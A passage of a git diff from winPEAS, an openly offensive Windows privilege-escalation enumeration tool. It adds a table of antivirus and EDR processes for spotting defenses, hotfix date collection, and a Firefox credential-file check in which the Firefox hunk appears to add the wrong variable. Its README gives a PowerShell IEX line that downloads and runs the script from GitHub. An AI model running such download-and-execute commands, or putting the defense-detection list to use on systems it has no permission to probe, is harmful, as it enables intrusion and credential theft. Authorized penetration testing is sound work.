""}, - {"regedt32.exe" , ""}, - {"rescue.exe" , ""}, - {"rescue32.exe" , ""}, - {"rrguard.exe" , ""}, - {"rtvscan.exe" , ""}, - {"rtvscn95.exe" , ""}, - {"rulaunch.exe" , ""}, - {"run32dll.exe" , ""}, - {"rundll.exe" , ""}, - {"rundll16.exe" , ""}, - {"ruxdll32.exe" , ""}, - {"safeweb.exe" , ""}, - {"sahagent.exescan32.exe" , ""}, - {"save.exe" , ""}, - {"savenow.exe" , ""}, - {"sbserv.exe" , ""}, - {"scam32.exe" , ""}, - {"scan32.exe" , ""}, - {"scan95.exe" , ""}, - {"scanpm.exe" , ""}, - {"scrscan.exe" , ""}, - {"SentinelOne.exe" , ""}, - {"serv95.exe" , ""}, - {"setupvameeval.exe" , ""}, - {"setup_flowprotector_us.exe", ""}, - {"sfc.exe" , ""}, - {"sgssfw32.exe" , ""}, - {"sh.exe" , ""}, - {"shellspyinstall.exe" , ""}, - {"shn.exe" , ""}, - {"showbehind.exe" , ""}, - {"shstat.exe" , "McAfee VirusScan Enterprise"}, - {"SISIDSService.exe" , ""}, - {"SISIPSUtil.exe" , ""}, - {"smc.exe" , ""}, - {"sms.exe" , ""}, - {"smss32.exe" , ""}, - {"soap.exe" , ""}, - {"sofi.exe" , ""}, - {"sperm.exe" , ""}, - {"splunk.exe" , "Splunk"}, - {"splunkd.exe" , "Splunk"}, - {"splunk-admon.exe" , "Splunk"}, - {"splunk-powershell.exe" , "Splunk"}, - {"splunk-winevtlog.exe" , "Splunk"}, - {"spf.exe" , ""}, - {"sphinx.exe" , ""}, - {"spoler.exe" , ""}, - {"spoolcv.exe" , ""}, - {"spoolsv32.exe" , ""}, - {"spyxx.exe" , ""}, - {"srexe.exe" , ""}, - {"srng.exe" , ""}, - {"ss3edit.exe" , ""}, - {"ssgrate.exe" , ""}, - {"ssg_4104.exe" , ""}, - {"st2.exe" , ""}, - {"start.exe" , ""}, - {"stcloader.exe" , ""}, - {"supftrl.exe" , ""}, - {"support.exe" , ""}, - {"supporter5.exe" , ""}, - {"svchostc.exe" , ""}, - {"svchosts.exe" , ""}, - {"sweep95.exe" , ""}, - {"sweepnet.sweepsrv.sys.swnetsup.exe", ""}, - {"symproxysvc.exe" , ""}, - {"symtray.exe" , ""}, - {"sysedit.exe" , ""}, - {"sysmon.exe" , "Sysinternals Sysmon"}, - {"sysupd.exe" , ""}, - {"TaniumClient.exe" , "Tanium"}, - {"taskmg.exe" , ""}, - {"taskmo.exe" , ""}, - {"taumon.exe" , ""}, - {"tbmon.exe" , ""}, - {"tbscan.exe" , ""}, - {"tc.exe" , ""}, - {"tca.exe" , ""}, - {"tcm.exe" , ""}, - {"tcpview.exe" , ""}, - {"tds-3.exe" , ""}, - {"tds2-98.exe" , ""}, - {"tds2-nt.exe" , ""}, - {"teekids.exe" , ""}, - {"tfak.exe" , ""}, - {"tfak5.exe" , ""}, - {"tgbob.exe" , ""}, - {"titanin.exe" , ""}, - {"titaninxp.exe" , ""}, - {"tlaservice.exe" , ""}, - {"tlaworker.exe" , ""}, - {"tracert.exe" , ""}, - {"trickler.exe" , ""}, - {"trjscan.exe" , ""}, - {"trjsetup.exe" , ""}, - {"trojantrap3.exe" , ""}, - {"tsadbot.exe" , ""}, - {"tshark.exe" , ""}, - {"tvmd.exe" , ""}, - {"tvtmd.exe" , ""}, - {"udaterui.exe" , ""}, - {"undoboot.exe" , ""}, - {"updat.exe" , ""}, - {"update.exe" , ""}, - {"updaterui.exe" , ""}, - {"upgrad.exe" , ""}, - {"utpost.exe" , ""}, - {"vbcmserv.exe" , ""}, - {"vbcons.exe" , ""}, - {"vbust.exe" , ""}, - {"vbwin9x.exe" , ""}, - {"vbwinntw.exe" , ""}, - {"vcsetup.exe" , ""}, - {"vet32.exe" , ""}, - {"vet95.exe" , ""}, - {"vettray.exe" , ""}, - {"vfsetup.exe" , ""}, - {"vir-help.exe" , ""}, - {"virusmdpersonalfirewall.exe", ""}, - {"vnlan300.exe" , ""}, - {"vnpc3000.exe" , ""}, - {"vpc32.exe" , ""}, - {"vpc42.exe" , ""}, - {"vpfw30s.exe" , ""}, - {"vptray.exe" , ""}, - {"vscan40.exe" , ""}, - {"vscenu6.02d30.exe" , ""}, - {"vsched.exe" , ""}, - {"vsecomr.exe" , ""}, - {"vshwin32.exe" , ""}, - {"vsisetup.exe" , ""}, - {"vsmain.exe" , ""}, - {"vsmon.exe" , ""}, - {"vsstat.exe" , ""}, - {"vstskmgr.exe" , "McAfee VirusScan Enterprise"}, - {"vswin9xe.exe" , ""}, - {"vswinntse.exe" , ""}, - {"vswinperse.exe" , ""}, - {"w32dsm89.exe" , ""}, - {"w9x.exe" , ""}, - {"watchdog.exe" , ""}, - {"webdav.exe" , ""}, - {"webscanx.exe" , ""}, - {"webtrap.exe" , ""}, - {"wfindv32.exe" , ""}, - {"whoswatchingme.exe" , ""}, - {"wimmun32.exe" , ""}, - {"win-bugsfix.exe" , ""}, - {"win32.exe" , ""}, - {"win32us.exe" , ""}, - {"winactive.exe" , ""}, - {"window.exe" , ""}, - {"windows.exe" , ""}, - {"wininetd.exe" , ""}, - {"wininitx.exe" , ""}, - {"winlogin.exe" , ""}, - {"winmain.exe" , ""}, - {"winnet.exe" , ""}, - {"winppr32.exe" , ""}, - {"winrecon.exe" , ""}, - {"winservn.exe" , ""}, - {"winssk32.exe" , ""}, - {"winstart.exe" , ""}, - {"winstart001.exe" , ""}, - {"wintsk32.exe" , ""}, - {"winupdate.exe" , ""}, - {"wireshark.exe" , ""}, - {"wkufind.exe" , ""}, - {"wnad.exe" , ""}, - {"wnt.exe" , ""}, - {"wradmin.exe" , ""}, - {"wrctrl.exe" , ""}, - {"wsbgate.exe" , ""}, - {"wupdater.exe" , ""}, - {"wupdt.exe" , ""}, - {"wyvernworksfirewall.exe" , ""}, - {"xagt.exe" , ""}, - {"xpf202en.exe" , ""}, - {"zapro.exe" , ""}, - {"zapsetup3001.exe" , ""}, - {"zatutor.exe" , ""}, - /*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs - {"zonealarm" , ""}, - {"_avp32" , ""}, - {"_avpcc" , ""}, - {"rshell" , ""}, - {"_avpms" , ""}*/ + { "ALYac", new HashSet() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } }, + { "AVG Antivirus", new HashSet() { "avgui.exe", } }, + { "AVG", new HashSet() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } }, + { "Ad-Aware Total Security by Lavasoft", new HashSet() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } }, + { "AhnLab-V3", new HashSet() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } }, + { "Antiy-AVL", new HashSet() { "avl.exe", } }, + { "Arcabit", new HashSet() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } }, + { "Avast Antivirus", new HashSet() { "avastui.exe", } }, + { "Avast", new HashSet() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } }, + { "Avira", new HashSet() { "avira.webapphost.exe", } }, + { "Baidu", new HashSet() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } }, + { "BitDefender", new HashSet() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } }, + { "Bkav Pro", new HashSet() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } }, + { "CMC", new HashSet() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } }, + { "Cisco", new HashSet() { "sfc.exe", } }, + { "ClamAV", new HashSet() { "clamscan.exe", "freshclam.exe", } }, + { "Comodo", new HashSet() { "cavwp.exe", "cfp.exe", } }, + { "CrowdStrike Falcon", new HashSet() { "falconsensorwinos.exe", } }, + { "Cybereason", new HashSet() { "cybereasonransomfreeservicehost.exe", } }, + { "Cylance", new HashSet() { "cylancesvc.exe", } }, + { "Cynet", new HashSet() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } }, + { "Cyradar", new HashSet() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } }, + { "DrWeb", new HashSet() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } }, + { "ESET-NOD32", new HashSet() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } }, + { "F-Secure", new HashSet() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } }, + { "G Data AntiVirus", new HashSet() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } }, + { "GridinSoft Anti-Malware", new HashSet() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } }, + { "IObit Malware Fighter 3", new HashSet() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } }, + { "IObit Malware Fighter 6", new HashSet() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } }, + { "IObit Security 360", new HashSet() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } }, + { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } }, + { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } }, + { "Kaspersky Anti-Ransomware Tool for Business", new HashSet() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } }, + { "Kaspersky Anti-Virus 2011", new HashSet() { "kldw.exe", } }, + { "Kaspersky Anti-Virus 2013", new HashSet() { "ffcert.exe", } }, + { "Kaspersky Anti-Virus Personal", new HashSet() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } }, + { "Kaspersky Antivirus", new HashSet() { "avp.exe", } }, + { "Kaspersky", new HashSet() { "klnagent.exe", } }, + { "Malwarebytes", new HashSet() { "mbam.exe", "mbar.exe", "mbae.exe", } }, + { "McAfee All Access – AntiVirus Plus", new HashSet() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } }, + { "McAfee AntiSpyware", new HashSet() { "msssrv.exe", "mcspy.exe", "msscli.exe", } }, + { "McAfee AntiVirus Plus", new HashSet() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } }, + { "McAfee Antivirus", new HashSet() { "mcafee.exe", } }, + { "NANO Antivirus beta by Nano Security Ltd", new HashSet() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } }, + { "NANO-Antivirus", new HashSet() { "nanoav.exe", } }, + { "Norton Antivirus", new HashSet() { "nortonsecurity.exe", } }, + { "PCMatic", new HashSet() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } }, + { "Panda Security", new HashSet() { "psanhost.exe", } }, + { "Panda", new HashSet() { "avengine.exe", } }, + { "Quick Heal AntiVirus Pro", new HashSet() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } }, + { "Quick Heal Total Security", new HashSet() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } }, + { "Sophos Anti-Rootkit 1.5.0", new HashSet() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } }, + { "Sophos Anti-Virus", new HashSet() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } }, + { "Symantec Endpoint Protection", new HashSet() { "ccsvchst.exe", } }, + { "Symantec", new HashSet() { "sepwscsvc64.exe", } }, + { "Total Defense Anti-Virus", new HashSet() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } }, + { "Trend micro", new HashSet() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } }, + { "VIPRE Advanced Security by ThreatTrack Security", new HashSet() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } }, + { "VIPRE Antivirus by GFI Software", new HashSet() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } }, + { "ViRobot Anti-Ransomware by HAURI", new HashSet() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } }, + { "ViRobot Internet Security 2011 by HAURI", new HashSet() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } }, + { "Webroot", new HashSet() { "wrsa.exe", } }, + { "Windows defender", new HashSet() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } }, + { "Zillya Internet Security by ALLIT Service", new HashSet() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } }, + { "Zillya! Antivirus by ALLIT Service", new HashSet() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } }, + { "Zillya! Internet Security by ALLIT Service", new HashSet() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } }, + { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } }, + { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } }, + { "ZoneAlarm by Check Point, Inc", new HashSet() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } } }; + // reverse lookup list + public static Dictionary> AVVendorsByProcess = new Dictionary>(); + + static DefensiveProcesses() + { + // initialize the structure here + foreach (var kvp in Definitions) + { + var vendor = kvp.Key; + + foreach (var executable in kvp.Value) + { + var sanitizedExecutable = executable.Trim().ToLower(); + + if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable)) + { + AVVendorsByProcess.Add(sanitizedExecutable, new HashSet() { vendor }); + } + else + { + AVVendorsByProcess[sanitizedExecutable].Add(vendor); + } + } + } + } } } diff --git a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs index 275b762..fcf542f 100644 --- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs @@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties(); string dnsDomain = properties.DomainName; - const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering"; + const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering"; using (var search = new ManagementObjectSearcher(query)) { @@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo string hotfixes = ""; foreach (ManagementObject quickFix in collection) { - hotfixes += quickFix["HotFixID"].ToString() + ", "; + hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), "; } results.Add("Hostname", strHostName); diff --git a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs index a067c87..31d6c61 100644 --- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs +++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs @@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}"; if (File.Exists(firefoxCredentialFile4)) { - results.Add(firefoxCredentialFile4); + results.Add(firefoxCredentialFile3); } } } diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj index c819feb..19a037c 100755 --- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj +++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj @@ -118,6 +118,7 @@ + @@ -1002,6 +1003,7 @@ + @@ -1038,6 +1040,11 @@ + + + + + @@ -1058,7 +1065,7 @@ - + @@ -1068,6 +1075,10 @@ + + + + diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user index 0ca5182..faa7a28 100755 --- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user +++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user @@ -5,7 +5,7 @@ - fileanalysis debug + cloudinfo -network="auto" -ports="21,22,445" debug diff --git a/winPEAS/winPEASps1/README.md b/winPEAS/winPEASps1/README.md index 82f1232..ddf3fc8 100755 --- a/winPEAS/winPEASps1/README.md +++ b/winPEAS/winPEASps1/README.md @@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re ```bash powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" +``` ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - - -By Polop